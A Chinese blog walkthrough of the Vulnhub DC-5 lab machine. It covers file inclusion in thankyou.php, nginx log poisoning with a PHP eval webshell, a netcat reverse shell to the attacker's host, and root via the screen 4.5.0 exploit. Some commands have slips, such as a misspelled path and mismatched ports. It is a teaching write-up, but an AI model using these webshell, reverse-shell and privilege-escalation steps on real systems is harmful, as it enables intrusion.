首页 > 其他分享 >vulnhub DC-5靶场

vulnhub DC-5靶场

时间:2023-12-12 17:45:57浏览次数:24  
标签:8888 log DC 192.168 sh vulnhub 42.149 靶场 php

1.信息收集

扫描主机

sudo arp-scan -l

扫描端口

nmap -p- 192.168.42.149

扫描指纹

whatweb 192.168.42.149

3

查看端口详细服务

nmap -A -p- -v 192.168.42.149

4

2.网站分析

扫描目录

dirbuster

5

浏览网站,发现都是静态页面

6

只有contact.php有上传窗口

7

尝试上传,发现问题copyright旁的数字发生变化,猜测thankyou.php存在文件包含

8

9

包含文件为footer.php

10

3.漏洞利用

开始bp测试字段(下面没图了,bp爆破,网站日志太大,无法连接蚁剑,建议大家在此靶场不要跑bp)

11

thankyou.php?file=/ect/passwd

植入一句话木马

thankyou.php?file=<?php @eval($_POST[cmd]);?>

由于前面信息收集我们确认了是nginx的站,访问日志和错误日志应该如下

/var/log/nginx/access.log

/var/log/nginx/error.log

文件包含,蚁剑连接shell

thankyou.php?file=/var/log/nginx/error.log

cmd

将shell反弹到kali上便于操作

s:nc hackip 8888 -e /bin/sh

监听

hack:nc -lvp 8888

优化界⾯

python -c "import pty;pty.spawn('/bin/bash')"

4.提升权限

提权常规命令

sudo -l

find / -perm -u=s -type f 2>/dev/null

提权命令网站

https://gtfobins.github.io/

发现screen 4.5.0,查找他的漏洞

searchsploit screen 4.5.0

searchsploit -m linux/local/41154.sh

真实目录

usr/share/exploitdb/exploits/linux/local/41154.sh

然后在桌面上用vim打开文件

发现脚本由三部分组成,两个c文件,一个命令集,拆分为三部分

kali监听端口

python -m SimpleHTTPServer 8000

攻击机在kali上下载脚本

``wget 192.168.42.149:8888/libhax.c wget 192.168.42.149:8888/rootshell.c wget 192.168.42.149:8888/dc5.sh`

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

chmod +x dc5.sh

./dc5.sh

提权成功
(后面会在做一次,补一下图片)

标签:8888,log,DC,192.168,sh,vulnhub,42.149,靶场,php
From: https://www.cnblogs.com/xiheaaa/p/17897411.html

相关文章

  • 多种DC电源模块的比较和评价
    多种DC电源模块的比较和评价BOSHIDADC电源模块是一种重要的电子零件,可以将交流电转换为直流电,并为相应的电路提供所需的电能。随着技术的进步,市场上的DC电源模块种类越来越多,不同类型的DC电源模块有着不同的特点和优缺点。 1.线性稳压模块线性稳压模块是一种简单而实用的DC......
  • CH32V307 ADC与触摸按键的使用
    CH32V307的ADC模块具有两个独立的ADC单元,12位分辨率,支持16个外部通道和2个内部信号源采样。CH32V307的触摸检测单元,借助ADC模块的电压转换功能,通过将电容量转换为电压量进行采样,实现触摸按键检测功能。检测通道复用ADC的16个外部通道,通过ADC模块的单次转换模式实现触摸按键检测。......
  • 热点 | 百利天恒HER3/EGFR双抗ADC
     前言:新开一个标签-《热点》,强迫自己去学习一下领域的热点事件,精通是不太可能了,但最少要知道是个怎么回事。 科普:什么是ADC?可以简单理解为抗体靶向+化疗杀伤的结合。抗体偶联药物(antibodydrugconjugates,ADCs)是一类将特异性单克隆抗体与细胞毒性药物通过接头偶联形成的......
  • vulnhub DC-4靶场
    1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹,没有收获查找目录,无敏感信息2.漏洞利用访问网站,发现只有登录框,猜测为弱密码或密码爆破bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)账号密码为adminhappy进入网......
  • 写了一个flinkcdc的简单demo,大概说一下实现过程和建议点
    架构图大致如下:版本信息大致如下,具体版本信息根据自己的需求进行调整即可:oracle:19cflinkcdc:2.4.0kafka:3.1.2flink:1.15.4mysql:8.0.27springboot:2.5.6实现需求:1.使用flinkcdc采集oracle中的数据(历史数据+增量数据:含增删改)同步至kafka的某个topic中2.使用flink消费kafka中......
  • vulnhub DC-1靶场
    1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2......
  • Polar靶场web刷题记录
    Polar靶场web刷题记录简单部分swp考点:敏感文件、preg_match()函数绕过根据题目名提示访问/.index.php.swp可以用代码格式化工具美化一下functionjiuzhe($xdmtql){ returnpreg_match('/sys.*nb/is',$xdmtql);}$xdmtql=@$_POST['xdmtql'];if(!is_array($xdmtql)){......
  • DC-1
    1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run3.metepreter>看到这个,说明成功拿下......
  • covfefe靶场
    covfefe靶机渗透1.信息收集扫描出多个IPnmap只发现192.168.42.146有端口开放,为22,80,31337扫描192.168.42.146的22,80,31337端口,看看开放的服务用dirb找找目录2.资源分析查看robots.txt,寻找目录访问taxes,拿到flag1进入ssh目录,下载rsa,pub3.漏洞利用下载了ssh的公......
  • vulnhub-Deathnote
    Deathnote0x01信息收集渗透的第一件事那就是信息收集,虚拟机启动起来,nmap扫一手, 192.168.56.101存在,并且开启了80和22端口,那么就访问页面。但是页面返回的结果是没找到http://deathnote.vuln这个网址 那么根据我做题的经验,这应该是需要绑定域名的,意思就是192.168.56.101......